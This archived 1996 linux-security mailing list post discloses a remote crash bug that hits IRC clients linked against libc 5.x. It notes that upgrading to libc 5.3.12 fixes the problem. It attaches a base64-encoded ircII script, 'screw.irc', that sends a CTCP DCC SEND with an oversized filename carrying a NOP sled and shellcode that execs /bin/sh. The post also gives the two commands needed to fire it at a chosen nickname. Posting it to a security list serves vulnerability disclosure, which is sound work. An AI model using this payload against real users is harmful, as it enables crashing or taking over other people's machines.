[712] in linux-security and linux-alert archive
[linux-security] Corrected post: Exploit for problem with libc >5.0.0 <5.3.9
daemon@ATHENA.MIT.EDU (lilo)
Thu May 9 17:44:55 1996
From: lilo <TaRDiS@mail.utexas.edu>
Date: Thu, 9 May 1996 11:49:57 -0500 (CDT)
To: Linux Security List <linux-security@tarsier.cv.nrao.edu>
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---1463811780-1085441611-831660434=:485
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.3.91.960509114830.485J@LiONS.reSEQ.UNGOV>
Sorry, pine is a little bit stubborn at times. Here is the corrected
posting with the attachment.
I wish I had time to look into this more carefully. However, I've confirmed
that with no other code changes, an upgrade to libc 5.3.12 eliminates this
problem. So far I have heard of no security holes in 5.3.12 though that
could certainly change.
You can see by inspection this exploit is probably a botched attempt to get
shell access on the other user's client.
To use this exploit to segfault someone's vanilla 2.8.2+ client:
/load screw.irc
/libc <the-user's-IRC-nickname>
I'd appreciate it if anyone who troubles to look into this more deeply could
send me some detail on just what is going on, for my records. It segfaults
with an illegal instruction.
Thank you for your time.
lilo
---1463811780-1085441611-831660434=:485
Content-Type: TEXT/PLAIN; name="screw.irc"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.91.960509114957.485K@LiONS.reSEQ.UNGOV>
Content-Description:
YWxpYXMgbGliYyB7DQovY3RjcCAkMCBEQ0MgU0VORCBmZWggMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJDrJF6NHoleCzPSiVYHiVYPuBtWNBI1EFY0Eo1OC4vR
zYAzwEDNgOjX////L2Jpbi9zaCAyMDQ4IDIwNDgNCn0NCg==
---1463811780-1085441611-831660434=:485--
